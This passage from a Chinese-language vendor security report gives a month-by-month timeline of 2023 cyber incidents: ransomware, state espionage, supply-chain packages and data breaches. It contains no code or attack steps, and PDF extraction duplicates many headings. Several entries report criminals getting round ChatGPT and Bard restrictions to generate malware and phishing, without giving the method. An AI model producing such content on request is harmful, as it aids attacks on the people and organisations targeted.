年安全报告年安全报告202023 年 重大网络事件 时间表第第 2 2 章章8CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告一月一月在某暗网论坛发现一个包含逾 1400 万用户名和密码的数据库,该数据库中有超过 10 万条澳大利亚政府机构门户网站的登录信息。Vice Society 勒索软件组织针对英国和美国的学校发动了一系列大范围攻击。作为对这些事态发展的回应,美国联邦调查局(FBI)已就该组织的活动发布官方警报。Check Point Threat Emulation Check Point Threat Emulation 提供针对此威胁的防护提供针对此威胁的防护(Trojan.Wins.(Trojan.Wins.ViceSociety.*)ViceSociety.*)Check Point Research 报告称,黑客论坛上的威胁执行者已开始利用 ChatGPT 等人工智能工具来创建恶意软件和攻击工具,例如信息窃取程序和加密程序。英国皇家邮政集团的国际邮件服务 Royal Mail 因网络攻击而中断运营。由于无法将包裹派送至目的地,该服务已告知用户暂停寄件。经证实,LockBit 勒索软件团伙是此次攻击的实施者,他们威胁称,如果赎金要求得不到满足,他们将泄露窃取的数据。Check Point Harmony Endpoint Check Point Harmony Endpoint 和和 Threat Emulation Threat Emulation 提供针对此威胁的防提供针对此威胁的防护护(Ransomware.Win.Lockbit)(Ransomware.Win.Lockbit)Check Point Research 发现,俄罗斯网络犯罪分子试图绕过 OpenAI 的限制,将 ChatGPT 用于恶意目的。在地下黑客论坛上,黑客们正在讨论如何绕过 IP 地址、支付卡和电话号码控件,而所有这些都是从俄罗斯访问 ChatGPT 所必需的流程。第第 2 2 章章9CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告二月二月Check Point Research 将市值为 1094.1525 万美元的 Dingoo 加密代币标记为骗局。该代币背后的威胁执行者在其智能合约中添加了后门功能,用于操纵费用。具体而言,他们使用代币智能合约代码中的“setTaxFeePercent”函数来操纵买卖费用,将其提升至交易额 99%的惊人比例。该函数已被使用 47 次,Dingo 代币的投资者有可能面临损失全部资金的风险。亲俄黑客组织 KillNet 针对美国医疗行业发起大规模行动,实施了多次 DDoS 攻击。英国运动服饰零售商 JD Sports 宣布发生数据泄露事件,约 1000 万客户受到影响。所称泄露的数据涵盖了客户在 2018 年 11 月至 2020 年 10 月期间提交的在线订单,其中包括全名、电子邮件、电话号码、账单详情、送货地址等信息。Check Point Research 曝光了两个恶意代码包 Python-drgn 和 Bloxflip,它们由威胁执行者分发,利用程序包存储库作为可靠、可扩展的恶意软件分发渠道。大规模“ESXiArgs”勒索软件活动影响数千台 VMware ESXi 主机,幕后组织已更新其恶意软件的加密流程。更新后的恶意软件版本现在还对原先可能用于触发恢复流程的文件进行加密,因此,用户无法通过研究人员推荐的可行方法进行恢复。Check Point IPS Check Point IPS 提供针对此威胁的防护提供针对此威胁的防护 VMWare OpenSLP VMWare OpenSLP 堆缓冲区溢出堆缓冲区溢出(CVE-2019-5544CVE-2019-5544;CVE-2021-21974CVE-2021-21974)社交媒体平台 Reddit 遭受安全漏洞攻击,此前他们的一名员工不幸落入网络钓鱼圈套。根据该公司的声明,虽然内部文件和源代码失窃,但用户信息和凭据并未受到影响。第第 2 2 章章10CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告以色列顶尖大学之一以色列理工学院(Technion)成为勒索软件攻击的目标,被迫关闭学院网络并将期末考试推迟到下学期。有人怀疑此次攻击可能出于政治或个人动机,因为作案者是以前不为人知的组织,而且勒索凭证中包含非常规信息。Check Point 研究人员发现,威胁执行者正绕过 ChatGPT 的限制创建恶意内容,并企图改进最早出现于 2019 年的初级信息窃取恶意软件的代码。研究人员分析了多个使用恶意软件包试图进行供应链攻击的活动。其中一项 Pypi(Python)活动创建了 450 余个与加密货币相关的程序包,这些程序包将替换加密货币钱包地址,另一项活动则注册了 5 个用于传播凭据窃取恶意软件的程序包。此外还观察到一项传播远程访问木马程序的 npm(Java)活动。新西兰奥克兰市宣布当地进入紧急状态,需全力应对导致城市 IT 系统离线的勒索软件攻击。大规模 ESXiArgs 勒索软件活动愈演愈烈,近日影响了 500 余台主机,其中大多数位于法国、德国、荷兰、英国和乌克兰。随着 OpenAI 推出名为 ChatGPT Plus 的付费 ChatGPT 服务,威胁执行者现以提供所谓的免费平台访问权限为名,诱使用户下载恶意应用程序或访问钓鱼网站。三月三月日客运量约为 1.8 万人的美国华盛顿州公共交通运营商 Pierce Transit 成为 LockBit 团伙实施的勒索软件攻击的受害者。该勒索软件组织声称其窃取了往来信件、保密协议、客户数据、合同等资料。Check Point Threat Emulation Check Point Threat Emulation 和和 Harmony Endpoint Harmony Endpoint 提供针对此威胁的防护提供针对此威胁的防护 (Ransomware.Win.Lockbit)(Ransomware.Win.Lockbit)第第 2 2 章章11CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告Check Point 研究人员发现了中国大陆高级持续性威胁(APT)组织 SharpPanda 的网络间谍活动。该活动针对东南亚政府实体,利用 Soul 框架建立对受害者网络的访问通道并窃取信息。Check Point Threat Emulation Check Point Threat Emulation 和和 Anti-bot Anti-bot 提供针对此威胁的防护提供针对此威胁的防护(Trojan.(Trojan.WIN32.SharpPanda)WIN32.SharpPanda)Check Point Research 披露了名为 FakeCalls 的 Android 木马,它可以模仿 20 多种金融应用程序,并通过模拟与银行员工的对话来进行语音钓鱼。这种针对韩国市场设计的恶意软件还可以从受害者的设备中提取私人数据。Check Point Check Point Harmony Mobile Harmony Mobile 和和 Threat Emulation Threat Emulation 提供针对此威胁的防提供针对此威胁的防护。护。Check Point Research 发现,国际象棋对弈平台 存在安全漏洞,可能导致用户操纵对局结果。利用该漏洞,研究人员可以缩短对手的可用时间,从而赢得棋局。Check Point Research 对 ChatGPT4 进行了分析,确定了五种允许威胁执行者绕过限制并利用 ChatGPT4 创建钓鱼电子邮件和恶意软件的场景。意大利豪华跑车制造商法拉利在公司 IT 系统遭到勒索攻击后宣布发生数据泄露。流出的数据包括公司客户的全名、地址、电子邮件地址和电话号码等个人信息。Check Point Research 在 PyPI(Python 软件包索引)上检测到恶意软件包,它们使用网络钓鱼技术隐藏其恶意意图。这些恶意软件包在安装过程中偷偷下载并执行混淆代码,导致供应链出现风险。Check Point CloudGuard Spectral Check Point CloudGuard Spectral 提供针对此威胁的防护。提供针对此威胁的防护。第第 2 2 章章12CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告四月四月3CX 通信公司 VoIP 应用程序 3CXDesktopApp 的 Windows 和 macOS 版本双双遭到入侵,被用于在大规模供应链攻击中分发木马化版本。该大范围攻击称为 SmoothOperator,其中威胁执行者使用 3CXDesktopApp 来加载恶意文件,并向攻击者的基础设施发送信标,对 3CX 的应用程序进行滥用。全球有超过 60 万家使用 3CX 的公司可能受到此次攻击的影响。该攻击与朝鲜 Lazarus 组织有关,追踪编号为 CVE-2023-29059。Check Point Threat Emulation Check Point Threat Emulation 和和 Harmony Endpoint Harmony Endpoint 提供针对此威提供针对此威胁的防护(胁的防护(Trojan-Downloader.Win.SmoothOperatorTrojan-Downloader.Win.SmoothOperator;Trojan.Wins.Trojan.Wins.SmoothOperatorSmoothOperator)澳大利亚最大的博彩娱乐公司皇冠度假集团(Crown Resorts)透露,其遭到 CL0P 勒索软件组织的勒索。此次勒索攻击也是 CL0P 组织利用 Fortra GoAnywhere 漏洞的结果。Check Point Threat Emulation Check Point Threat Emulation 和和 Harmony Endpoint Harmony Endpoint 提供针对此威胁的防提供针对此威胁的防护(护(Ransomware.Wins.ClopRansomware.Wins.Clop;Ransomware.Win.ClopRansomware.Win.Clop;Ransomware_Ransomware_Linux_ClopLinux_Clop)研究人员一直在追踪黑客组织 Anonymous Sudan,该组织向欧洲、澳大利亚、以色列等地的组织发动了多次 DDoS 攻击,针对的通常是视为反穆斯林的活动。业界认为该组织隶属于与俄罗斯有关的黑客组织 Killnet 并支持其秘密计划。Check Point Research 发现了名为 Rorschach 的新型勒索软件,该软件通过 DLL 旁加载合法签名安全产品进行部署。该勒索软件高度可定制,具有前所未见的独特技术功能,并且就加密速度而言,它是目前观察到的速度最快的勒索软件之一。Check Point Harmony Endpoint Check Point Harmony Endpoint 提供针对此威胁的防护。提供针对此威胁的防护。第第 2 2 章章13CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告Check Point Research 在 Microsoft Message Queuing 服务(通常简称为 MSMQ)中发现了三个漏洞(CVE-2023-28302、CVE-2023-21769 和 CVE-2023-21554)。CPR 将其中最严重的漏洞称为 QueueJumper(CVE-2023-21554),该漏洞为超危级别,可能允许未经身份验证的攻击者在 Windows 服务进程 mqsvc.exe 的情景中远程执行任意代码。Check Point IPS Check Point IPS 提供针对此威胁的防护提供针对此威胁的防护 Microsoft Message Queuing Microsoft Message Queuing 远程远程代码执行代码执行(CVE-2023-21554)(CVE-2023-21554)Check Point Research 指出,针对物联网设备的网络攻击急剧增加,与 2022 年相比,2023 年前两个月各组织每周遭受攻击的平均次数增加了 41%。平均而言,每周有 54%的组织遭受针对物联网设备的网络攻击,主要集中在欧洲,其次是亚太地区和拉丁美洲。Check Point Quantum IoT Protect Check Point Quantum IoT Protect 提供针对此威胁的防护提供针对此威胁的防护Check Point Research 警告称,有关被盗 ChatGPT 帐户的讨论和交易有所增加,尤其是高级帐户。网络犯罪分子会泄露 ChatGPT 帐户的凭据,交易高级 ChatGPT 帐户,并使用针对 ChatGPT 的暴力破解工具,这让网络犯罪分子能够绕过 OpenAI 的地理围栏限制,并获取现有 ChatGPT 帐户的历史查询信息。Check Point Research 团队发现了 Raspberry Robin 恶意软件所使用的新技术。这些方法包括若干种反躲避技术、混淆技术和反虚拟机措施。该恶意软件还利用 Win32k 中的两个漏洞(CVE-2020-1054 和 CVE-2021-1732)来提升其权限。Check Point Threat Emulation Check Point Threat Emulation 和和 IPS IPS 提供针对此威胁的防护提供针对此威胁的防护 Trojan.Wins.Trojan.Wins.RaspberryRobinRaspberryRobin;Microsoft Win32k Microsoft Win32k 权限提升权限提升(CVE-2021-1732)(CVE-2021-1732)、Microsoft Win32k Microsoft Win32k 权限提升权限提升(CVE-2020-1054)(CVE-2020-1054)第第 2 2 章章14CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告五月五月Check Point Research 公布了与 Educated Manticore 有关的新发现,该活动集群与出没于中东和北美地区的伊朗关联威胁执行者 Phosphorus 存在明显重合。Educated Manticore 紧随最新趋势,开始使用 ISO 映像(可能还有其他存档文件)来启动感染链。Check Point Harmony Endpoint Check Point Harmony Endpoint 和和 Threat Emulation Threat Emulation 提供针对此威胁的防提供针对此威胁的防护护(APT.Wins.APT35.ta)(APT.Wins.APT35.ta)Check Point Research 披露了名为 FluHorse 的新型 Android 恶意软件。该恶意软件模仿多款合法应用程序,其中大部分应用程序的安装量均超过 100 万次。该恶意软件会窃取受害者的凭据和双因素身份验证(2FA)代码。FluHorse 针对东亚市场的不同行业,通过电子邮件进行分发。Check Point Harmony Mobile Check Point Harmony Mobile 提供针对此威胁的防护提供针对此威胁的防护(FLU_HORSE_STR)(FLU_HORSE_STR)Check Point Research 注意到,利用 ChatGPT 品牌相关网站实施的网络攻击急剧增多。这些攻击包括通过与 ChatGPT 看似相关的网站分发恶意软件和实施网络钓鱼攻击,诱使用户下载恶意文件或泄露敏感信息。数据存储巨头 Western Digital 已证实发生数据泄露,公司客户的个人信息遭到曝光。流出的数据包括姓名、账单和送货地址、电子邮件地址和电话号码。威胁执行者声称他们与 ALPHV(又名 Black Cat)勒索软件团伙无关,但会利用该组织的泄密网站对上述公司实施恐吓与勒索。Check Point Research 发现了专为 TP-Link 路由器定制的固件植入程序,该植入程序与中国大陆政府支持的 APT 组织(名为 Camaro Dragon)有关,该组织与 Mustang Panda 存在相似之处。该植入程序用于针对欧洲外交实体发起定向攻击,由多个恶意组件构成。其中包括名为“Horse Shell”的自定义后门程序,它使攻击者能够保持持续访问、构建匿名基础设施,并允许横向移动至已遭入侵的网络。第第 2 2 章章15CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告Check Point Quantum IoT Protect Check Point Quantum IoT Protect 和和 Threat Emulation Threat Emulation 提供针对此威胁的提供针对此威胁的防护防护(APT.Wins.HorseShell)(APT.Wins.HorseShell)美国联邦调查局(FBI)、美国网络安全和基础设施安全局(CISA)和澳大利亚网络安全中心(ACSC)警告称,BianLian 勒索软件组织已将其策略转变为只进行勒索攻击。该组织现在不再加密文件及索要赎金,而是重点窃取敏感数据,并威胁称若不支付赎金便公开这些数据。Check Point Threat Emulation Check Point Threat Emulation 提供针对此威胁的防护提供针对此威胁的防护(Ransomware.Win.(Ransomware.Win.GenRansom.glsf.A)GenRansom.glsf.A)Check Point Research 发布了关于 GuLoader 的报告。GuLoader 是基于 shellcode 的知名下载程序,已在大量攻击中用于传播一系列榜上有名的恶意软件。GuLoader 的有效负载完全加密,允许威胁执行者使用常见公有云服务存储有效负载,并绕过病毒防护机制。Check Point Threat Emulation Check Point Threat Emulation 提供针对此威胁的防护提供针对此威胁的防护(Dropper.Win.(Dropper.Win.CloudEyE.*)CloudEyE.*)Check Point Research 详细介绍了中国大陆政府支持的最新攻击及其对网络设备的使用。在此之前,美国和国际网络安全机构针对中国大陆政府支持的网络攻击者(也称为 Volt Typhoon)发布了联合网络安全公告。该攻击者对包括政府和通信组织在内的多个行业的“关键”网络基础设施实施了破坏。六月六月Progress 披露了 MOVEit Transfer 和 MOVEit Cloud 中的一个漏洞(CVE-2023-34362),该漏洞可导致权限升级以及对环境的无授权访问。发现该漏洞后,Progress 立即着手开展调查,48 小时内便发布了缓解措施和安全补丁。然而与俄罗斯有关联的勒索软件组织 Clop 网络犯罪分子还是趁虚而入,利用该漏洞对 MOVEit 用户发起了供应链攻击。作为受害者之一,薪资服务提供商 Zellis 率先披露了安全漏洞攻击,此外还有许多其他组织也都受到了影响。第第 2 2 章章16CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告Check Point IPS Blade Check Point IPS Blade 提供针对此威胁的防护提供针对此威胁的防护 MOVEit Transfer SQL MOVEit Transfer SQL 注入注入 (CVE-2023-34362)(CVE-2023-34362)Check Point Research 发布了对中国大陆 APT 组织 Camaro Dragon 所用后门工具的分析报告。该后门工具称为 TinyNote,使用 Go 语言编写,其中包含可绕过东南亚国家/地区常用的印度尼西亚防病毒软件 SmadAV 的功能。APT 组织的受害者可能包括东南亚国家/地区的大使馆。Check Point Threat Emulation Check Point Threat Emulation 提供针对此威胁的防护提供针对此威胁的防护(APT.Wins.(APT.Wins.MustangPanda.ta.*)MustangPanda.ta.*)美国伊利诺伊州某医院因遭受勒索软件攻击而面临停业,成为首家因此类事件而关闭的医疗机构。SMP Health 曾在 2021 年遭受攻击,医院长达数月之久无法向保险公司提交理赔申请(包括 Medicare 和 Medicaid)。这一情形导致医院财务状况急剧恶化。美国路易斯安那州机动车辆办公室(OMV)和俄勒冈州机动车辆管理处(DMV Services)发表声明警告美国公民,有数百万驾照数据遭到泄露。在此之前,Clop 勒索软件团伙入侵了上述机构的 MOVEit Transfer 安全文件传输系统,并窃取了其中存储的数据。Check Point IPS BladeCheck Point IPS Blade、Harmony Endpoint Harmony Endpoint 和和 Threat Emulation Threat Emulation 提供针提供针对此威胁的防护对此威胁的防护 (Progress MOVEit Transfer Progress MOVEit Transfer 的多个漏洞);的多个漏洞);Webshell.Webshell.Win.MoveitWin.Moveit,Ransomware.Win.ClopRansomware.Win.Clop,Ransomware_Linux_ClopRansomware_Linux_Clop;Exploit.Exploit.Wins.MOVEitWins.MOVEitCheck Point 研究人员发现,欧洲一家医疗机构受到复杂恶意软件影响。攻击由中国大陆政府支持的 APT 组织 Camaro Dragon(Mustang Panda)发起。威胁执行者使用恶意 U 盘作为初始访问向量,对受限网络进行攻击,其有效负载包含的模块可对插入受感染主机的任何其他 U 盘实施进一步感染。据信,该恶意软件的传播已超出攻击者原本的目标,有可能悄然之间感染全球数十家组织。第第 2 2 章章17CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告Check Point Harmony Endpoint Check Point Harmony Endpoint 和和 Threat Emulation Threat Emulation 提供针对此威胁的防提供针对此威胁的防护(护(APT.Wins.MustangPandaAPT.Wins.MustangPanda;APT.Wins.MustangPanda.taAPT.Wins.MustangPanda.ta)七月七月Check Point Research 发现了热门消息应用程序 Telegram 的恶意修改版本。该恶意应用程序会安装 Triada 木马,可为受害者注册各种付费订阅,执行应用内购买并窃取登录凭据。美国电视频道 Nickelodeon 疑似发生数据泄露,致使 500 GB 数据外流。这些数据包括脚本、动画文件和完整剧集,经该电视频道证实为合法内容,但都是几十年前的旧数据。上述泄露事件发生在 1 月,起因是信息反馈门户网站存在身份验证漏洞。Check Point Research 发布了对 Google 生成式人工智能平台 Bard 的分析报告,介绍了该平台允许会生成恶意内容的几种场景。威胁执行者可以利用 Bard 生成网络钓鱼电子邮件、恶意软件键盘记录程序和初级勒索软件代码。由中国大陆威胁执行者“Storm-0558”发起的 Microsoft Exchange 电子邮件帐户间谍活动据传访问了美国驻华大使的电子邮件帐户,泄露了数十万封美国政府的个人电子邮件。研究人员警告称,该活动中使用的方法也可能已经攻击了其他 Microsoft 服务的用户帐户,例如 OneDrive 和 Azure 环境。挪威政府报告称,由 12 个主要部门使用的软件平台遭到网络攻击。黑客在此之前利用了 Ivanti Endpoint Manager Mobile(EPMM)中的零日身份验证来绕过漏洞。第第 2 2 章章18CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告八月八月Prospect Medical Holdings 是一家大型医疗服务提供商,在美国经营着 16 家医院和 166 家专科诊所及服务中心,日前遭受了严重的勒索软件攻击。攻击至少扰乱了公司在三个州的运营,迫使医院将患者转移到其他设施。目前还未有勒索软件团伙公开宣称对此次攻击负责。Check Point 研究人员就基于 NPM 的漏洞分享了最新调查结果,表示在 50 多个热门软件包中都发现了这类漏洞,令无数项目和组织面临风险。Check Point CloudGuard CNAPP Check Point CloudGuard CNAPP 提供针对此威胁的防护提供针对此威胁的防护Discord.io 已证实公司正在处理一起数据泄露事件,该事件曝光了 76 万名会员的信息,导致服务暂时中止。此前,名为 Akihirah 的网络犯罪分子在某地下论坛公开了 Discord 的数据库。研究人员发现了一项针对台湾地区数十个组织的持续间谍活动。研究人员认为该活动系由名为 Flax Typhoon 的中国大陆 APT 组织实施,该组织与 Ethereal Panda 有所重合。该威胁组织会最大限度避开自定义恶意软件,改用受害者操作系统中的合法工具来开展间谍活动。亲俄黑客侵入波兰铁路网络指定频率,扰乱了波兰西北部的列车服务。黑客在攻击过程中播放了俄罗斯国歌以及俄罗斯总统普京的讲话。第第 2 2 章章19CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告九月九月FBI 宣布,“猎鸭行动”(Duck Hunt)成功瓦解了至少从 2008 年开始活跃的 Qakbot 恶意软件组织。据了解,Qakbot 通过带有恶意附件和链接的垃圾邮件来感染受害者,同时还充当勒索软件操纵者的平台。全球有超过 70 万台计算机受到影响,其中包括金融机构、政府承包商和医疗设备制造商等。Check Point Research 分享了对 Qakbot 恶意软件及其多年来运作情况的分析。Check Point Harmony Endpoint Check Point Harmony Endpoint 和和 Threat Emulation Threat Emulation 提供针对此威胁的提供针对此威胁的防护(防护(Trojan.Wins.QbotTrojan.Wins.Qbot;Trojan.Win.QbotTrojan.Win.Qbot;Trojan.Downloader.Win.Trojan.Downloader.Win.QbotQbot;Trojan-PSW.Win32.QakbotTrojan-PSW.Win32.Qakbot;Trojan.WIN32.QakbotTrojan.WIN32.Qakbot)Check Point 警告称,最近发生了一起滥用数据可视化工具 Google Looker Studio 的电子邮件网络钓鱼活动。攻击者使用该工具从官方 Google 帐户向受害者发送幻灯片电子邮件,指示他们访问第三方网站领取加密货币。这些网站随后会提示受害者输入凭据,继而窃取这些凭据。Check Point Harmony Email Check Point Harmony Email 提供针对此威胁的防护。提供针对此威胁的防护。Check Point 研究人员分析了新兴的生成式人工智能技术对选举造势活动的潜在影响。生成式人工智能可以针对选民大规模构建单独定制的视听宣传内容,使民主选举的公正性面临更大的风险。为应对这一问题,Google 将要求披露涉及人工智能的政治广告。美国度假村、赌场和连锁酒店集团米高梅(MGM)遭遇网络攻击,公司旗下酒店和赌场由此发生大面积业务中断,为谨慎起见,该公司已关闭其内部网络。此次网络攻击导致该公司的自动取款机、老虎机、客房数字钥匙卡和电子支付系统陷入瘫痪。ALPHV 勒索软件关联组织已声称对此次攻击负责。Check Point Research 分享了对 ALPHV 组织过去 12 个月活动的分析洞察。第第 2 2 章章20CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告Monti 勒索软件团伙已声称对新西兰第三大高校奥克兰理工大学遭受的网络攻击负责。威胁执行者声称窃取了 60 GB 数据,要求受害者在 10 月 9 日最后期限之前支付赎金。Check Point Threat Emulation Check Point Threat Emulation 提供针对此威胁的防护提供针对此威胁的防护(Ransomware.Wins.(Ransomware.Wins.Monti)Monti)Check Point Research 发现了 BBTok 银行恶意软件的新版本,其攻击目标是 40 多家墨西哥和巴西银行的众多客户。研究团队重点介绍了新发现的感染链,其中使用了独特的离地攻击二进制文件(LOLBins)组合,因此检出率很低。研究团队还披露了威胁执行者在攻击中使用的一些服务器端资源,其攻击目标是巴西和墨西哥的数百名用户。Check Point Threat Emulation Check Point Threat Emulation 和和 Harmony Endpoint Harmony Endpoint 提供针对此威胁提供针对此威胁的防护(的防护(Banker.Wins.BBTokBanker.Wins.BBTok;Banker.Win.BBTokBanker.Win.BBTok;Technique.Wins.Technique.Wins.SuxXllSuxXll;Trojan.Win.XllAddingsTrojan.Win.XllAddings)十月十月Check Point 研究人员检测到利用主流文件共享程序 Dropbox 的网络钓鱼活动。威胁执行者使用合法的 Dropbox 页面向受害者发送官方电子邮件,这些邮件随后会将收件人重定向至凭据窃取页面。Check Point 研究人员发现了影响 WEB3 社交媒体平台 Friend.tech 的多个严重漏洞。这组漏洞可能会允许攻击者访问和修改属于该公司的数据库值,并获得对付费功能的访问权限。服务于美国威斯康星地区逾 16 万人口的洛克县公共卫生局成为勒索软件攻击的受害者,攻击导致工作人员被迫下线了部分系统。古巴勒索软件团伙已声称对此次攻击负责,并宣布财务文件、税务信息等已落入其手中。第第 2 2 章章21CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告Check Point Harmony Endpoint Check Point Harmony Endpoint 和和 Threat Emulation Threat Emulation 提供针对此威胁的防提供针对此威胁的防护(护(Ransomware.Win.CubaRansomware.Win.Cuba、Ransomware.Wins.Cuba.ta.*Ransomware.Wins.Cuba.ta.*)市值数十亿美元的 IT 产品和服务经销商 CDW 据称遭受攻击,LockBit 勒索软件团伙声称对此次攻击负责。该团伙索要 8000 万美元赎金,并威胁要公布窃取的数据,据说其中包括员工通行卡、审计、佣金支付数据等等。该公司已隔离受影响的服务器,据称这些服务器并非面向客户。Check Point Harmony Endpoint Check Point Harmony Endpoint 和和 Threat Emulation Threat Emulation 提供针对此威胁的防提供针对此威胁的防护(护(Ransomware.Win.LockbitRansomware.Win.Lockbit;Gen.Win.Crypter.LockbitGen.Win.Crypter.Lockbit;Ransomware.Ransomware.Wins.LockBit.taWins.LockBit.ta;Ransomware_Linux_LockbitRansomware_Linux_Lockbit)FBI 与 CISA 在其#StopRansomware 活动中发布了一份联合网络安全咨询报告,就 AvosLocker 勒索软件发出警告并对其进行了深入研究,该勒索软件以勒索软件即服务(RaaS)模式运作。两大机构重点介绍了相关技术细节及该组织的 TTP,以协助采取缓解和防御措施。Check Point Harmony Endpoint Check Point Harmony Endpoint 和和 Threat Emulation Threat Emulation 提供针对此威提供针对此威胁的防护(胁的防护(Ransomware.Wins.Avoslocker.ta.ARansomware.Wins.Avoslocker.ta.A、Gen.Win.Crypter.Gen.Win.Crypter.AvosLocker.BAvosLocker.B、Ransomware.Win.AvosLocker.BRansomware.Win.AvosLocker.B、Ransomware_Linux_Ransomware_Linux_AvosLockerAvosLocker)攻击者已获得云身份认证巨头 Okta 部分网络的访问权限。黑客已成功潜入该公司的支持部门至少两周,他们试图使用从支持票证复制的令牌来访问该公司的客户网络。据称,该公司是在一名客户报告称支持票证令牌遭到滥用后才意识到这一事件。Check Point Research 分析了与巴以冲突前十日局势相关的网络活动。与中东、伊斯兰和俄罗斯有关的多个黑客组织加大了针对以色列的攻击力度。研究人员已观察到多种攻击向量,包括 DDoS、篡改和一些以色列网站的信息泄露,其中大多数产生的影响都非常有限。第第 2 2 章章22CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告斯坦福大学成为一起网络攻击的受害者,攻击对该校公共安全部(SUDPS)的系统造成了影响。Akira 勒索软件团伙声称对此次攻击负责,据称攻击导致该校 430 GB 数据发生外泄。Check Point Harmony Endpoint Check Point Harmony Endpoint 和和 Threat Emulation Threat Emulation 提供针对此威胁的防提供针对此威胁的防护(护(Ransomware_Linux_AkiraRansomware_Linux_Akira;Ransomware.Wins.AkiraRansomware.Wins.Akira)十一月十一月波音公司承认网络攻击影响了其零部件和分销业务,公司正配合执法部门展开调查。本周早些时候,勒索软件组织 LockBit 将波音公司添加到其受害者页面,并声称已窃取大量数据。Check Point Harmony Endpoint Check Point Harmony Endpoint 和和 Threat Emulation Threat Emulation 提供针对此威胁的防提供针对此威胁的防护(护(Ransomware.Win.LockbitRansomware.Win.Lockbit、Ransomware_Linux_LockbitRansomware_Linux_Lockbit)Check Point Research 披露了与伊朗情报和安全部(MOIS)有关的威胁组织 Scarred Manticore 进行的持续间谍活动。这些攻击依赖于安装在 Windows 服务器上的高级被动恶意软件框架 LIONTAIL。当前活动的攻击目标是中东地区高知名度的组织,重点针对政府、军事和电信部门。Check Point IPSCheck Point IPS、Threat Emulation Threat Emulation 和和 Harmony Endpoint Harmony Endpoint 提供针对此威胁提供针对此威胁的防护(的防护(Backdoor.WIN32.Liontail.A/BBackdoor.WIN32.Liontail.A/B、APT.Wins.Liontail.C/DAPT.Wins.Liontail.C/D)Check Point Research 近日发布了关于巴以冲突中不断演变的网络事件的述评。最近几周的情况表明,亲巴勒斯坦黑客组织已将其活动范围扩大到以色列以外,主要针对被视为以色列盟友的国家/地区。这些网络行动旨在发挥情报和反击作用,但据悉造成的破坏有限。值得注意的是,攻击目标选择的决定因素除了不断演变的地缘政治事件,还有这些组织先前确立的利益。第第 2 2 章章23CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告中国大陆最大的商业银行中国工商银行(ICBC)美国子公司遭受勒索软件攻击,导致其部分金融服务系统瘫痪,据悉影响了美国国债的流动性。据报道,LockBit 勒索软件团伙是此次攻击的幕后黑手。Check Point Threat Emulation Check Point Threat Emulation 和和 Harmony Endpoint Harmony Endpoint 提供针对此威胁的防提供针对此威胁的防护(护(Ransomware.Wins.LockBit.ta*Ransomware.Wins.LockBit.ta*;Ransomware.Win.LockbitRansomware.Win.Lockbit;Gen.Win.Gen.Win.Crypter.Lockbit.AICrypter.Lockbit.AI;Ransomware_Linux_LockbitRansomware_Linux_Lockbit)据报道,与俄罗斯有关的军事情报组织 SandWorm 对丹麦 22 家关键基础设施公司发动了攻击。这是丹麦有史以来最严重的网络攻击,多个工业控制系统遭到入侵,多家能源企业被迫离网运营。Check Point Research 进行了一次实验性深度解析,旨在测试 ChatGPT 的恶意软件分析功能。研究结果重点关注人工智能系统需要哪些指导才能扩展其功能并做出裁决。总部位于美国内华达州的医疗转录公司 Perry Johnson&Associates(PJ&A)披露了一起数据泄露事件,美国多家医疗机构的超过 900 万名患者在该事件中受到影响。外泄数据包括患者的姓名、地址、出生日期、社会安全号码和医疗记录。这起攻击被认为是近年来最严重的医疗数据泄露事件之一。Check Point Research 使用 Threat Intel Blockchain 系统发现了一场正在进行的复杂 Rug Pull 骗局,该计划已顺利窃走近 100 万美元。研究人员已追踪到骗局的幕后主使,曝光了犯罪分子利用围绕不正当收入的群体炒作,诱骗毫无防备的受害者进行投资。第第 2 2 章章24CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告十二月十二月Check Point Research 重点介绍了 Cyber Av3ngers 组织的活动,该组织表示对破坏美国宾夕法尼亚州 Aliquippa 市水务局工作站的行为负责。攻击发生后,CISA 发布了一份关于该黑客组织的公告,该组织与伊朗革命卫队(IRGC)有关。据报道,他们以 Unitronics 的 PLC 设备作为突破口,对美国多家水务公司实施了攻击。服务于数百万人的美国大里士满交通公司(GRTC)成为一起网络攻击的受害者,攻击影响了 GRTC 网络的某些应用程序和部分功能。Play 勒索软件团伙声称对此次攻击负责。Check Point Harmony Endpoint Check Point Harmony Endpoint 和和 Threat Emulation Threat Emulation 提供针对此威胁的防提供针对此威胁的防护(护(Ransomware.Win.PlayRansomware.Win.Play;Ransomware.Wins.PLAYRansomware.Wins.PLAY)Check Point Research 揭示了加密货币领域一项令人担忧的趋势。欺诈攻击者通过操纵代币池流动性,使代币价格暴涨 22000%。操纵代币池流动性的行为导致毫无戒心的代币持有者被有计划地迅速窃走 8 万美元。这一事件揭示了诈骗者为利用去中心化金融平台所采取的不断演变的策略。乌克兰最大的移动运营商 Kyivstar 遭受了“针对全球电信基础设施的最大规模网络攻击”,导致数百万人在至少 48 小时内无法使用移动和互联网服务。据报道,此次攻击还影响了空袭警报、自动取款机和销售点终端。与俄罗斯有关的组织 Solntsepek(此前与俄罗斯军事黑客组织 Sandworm 有关联)声称对此次攻击负责。另一个与俄罗斯关联的组织 Killnet 也声称对此次攻击负责,但其参与情况尚未得到证实。Kyivstar 拥有 2430 万移动用户和超过 110 万家庭互联网用户。第第 2 2 章章25CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告30网络安全趋势第第 3 3 章章26CHECK POINT SOFTWARE|2024 2024 